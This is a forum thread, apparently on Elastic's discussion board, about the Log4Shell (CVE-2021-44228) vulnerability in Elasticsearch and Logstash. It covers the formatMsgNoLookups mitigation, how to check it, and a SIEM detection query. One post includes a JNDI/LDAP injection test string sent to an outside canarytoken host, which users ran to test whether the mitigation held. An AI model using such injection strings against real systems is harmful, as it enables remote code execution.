Zero-day-exploit in log4j2 which is part of elasticsearch

Elasticsearch 7.1.1 seems to contain log4j 2.11.1

So is Elasticsearch affected? Will there be a new 7.1.x?

2 Likes

Elasticsearch 7.1 is no longer maintained so if a patch is required it would be as 7.16.x.

I think this affect almost every version, 7.16.0, which was released this week, uses log4j-core-2.11.1.jar and log4j-api-2.11.1.jar.

One way of mitigation is to use the following line in the jvm.options file.

-Dlog4j2.formatMsgNoLookups=true
5 Likes

I use Elasticsearch 7.8,but i can‘t reproduce bug.(I made an error and the JNDI instructions were printed in the the Elasticsearch log, but the JNDI instructions were not called).I don't understand why

1 Like

How do I confirm that the -Dlog4j2.formatMsgNoLookups=true takes effect? Is it possible to get any confirmation from cluster/settings ?

1 Like

Just an FYI; Add logging property by ChrisHegarty · Pull Request #81622 · elastic/elasticsearch (github.com) was just merged into master, so the environment variable appears to be the "fix" for this.

Hi hocho,
What I did was open htop on my linux terminal and then press F5 to see the processes in tree view. Find the Elasticsearch process, and it displays the process as the command that was used to invoke the Elasticsearch process along with all the java parameters.
htop-elasticsearch

if you scroll to the right to see the rest of the command that initiated the process, you can see the parameter listed there.
htop-elasticsearch-param

Sorry for the imgur links - my browser wouldn't let me upload the images for some reason.

2 Likes

You can run the following in the terminal:

ps -ef | grep elasticsearch | grep formatMsgNoLookups
4 Likes

Hi team! quick question, i found that in Logstash folder we have the file jvm.options and if i run "ps | grep log4j" i see the vulnerable log4j package. Should i add the "-Dlog4j2.formatMsgNoLookups=true" in Logstash???. Thanks in advance! Regards!

@Nu11
Ive added it to that and hoping its correct while waiting for 7.16.1

Working on adding -Dlog4j2.formatMsgNoLookups=true ....

So are we sure this works? What's the impact of adding this?

1 Like

Is there any way to apply the mitigation to a cluster hosted in Elastic Cloud? I cannot find a way to set JVM options in the user interface.

Please report security issues to security@elastic.co as per the online instructions

@dadoonet Some official Elastic communication and recommendation about this would be nice. Unauthenticated RCE is not nice..

Still working on adding -Dlog4j2.formatMsgNoLookups=true ....

So are we sure this works? What's the impact of adding this?

Please see Apache Log4j2 Remote Code Execution (RCE) Vulnerability - CVE-2021-44228 - ESA-2021-31.

We will be making more announcements as details become clearer.

I've confirmed -Dlog4j2.formatMsgNoLookups=true doesn't work. What the hell? Why still no patch?

docker run -it logstash:7.14.2 bash
echo '${jndi:ldap://XXX.canarytokens.com/a}' | logstash -e 'filter { json { source => "message" } }'

bash-4.2$ tail -1 jvm.options
-Dlog4j2.formatMsgNoLookups=true

Logstash {"logstash.version"=>"7.14.2", "jruby.version"=>"jruby 9.2.19.0 (2.5.8) 2021-06-15 55810c552b OpenJDK 64-Bit Server VM 11.0.12+7 on 11.0.12+7 +indy +jit [linux-x86_64]"}

Folks please be aware that this dropped Friday and is it the weekend in most parts of the world. While we are working on a fix and uncovering it's impact on our products, please do respect that we don't work 24/7 :slight_smile:

3 Likes

Further update, please see Apache Log4j2 Remote Code Execution (RCE) Vulnerability - CVE-2021-44228 - ESA-2021-31 as it's been amended with details for each of the products and the impact that this RCE has.

TLDR - Elasticsearch is safe due to the use of the Java security manager.

4 Likes

@warkolm Not trying to question Elastic's findings, but wondering why I see reports and screenshot of hacked Elasticsearch instance while Elastic says:

See:

About a SIEM rule => The following query is defintely useful:

(*jndi\:ldap\:* OR *jndi\:rmi\:* OR *jndi\:ldaps* OR *jndi\:dns*)

The problem is due to the front wildcards, it's a very expensive query

1 Like

@willemdh That's not an Elasticsearch instance, it's the search results on the https://www.elastic.co/ site.
The behaviour of the search has changed since yesterday, that search now triggers a 406 response.

1 Like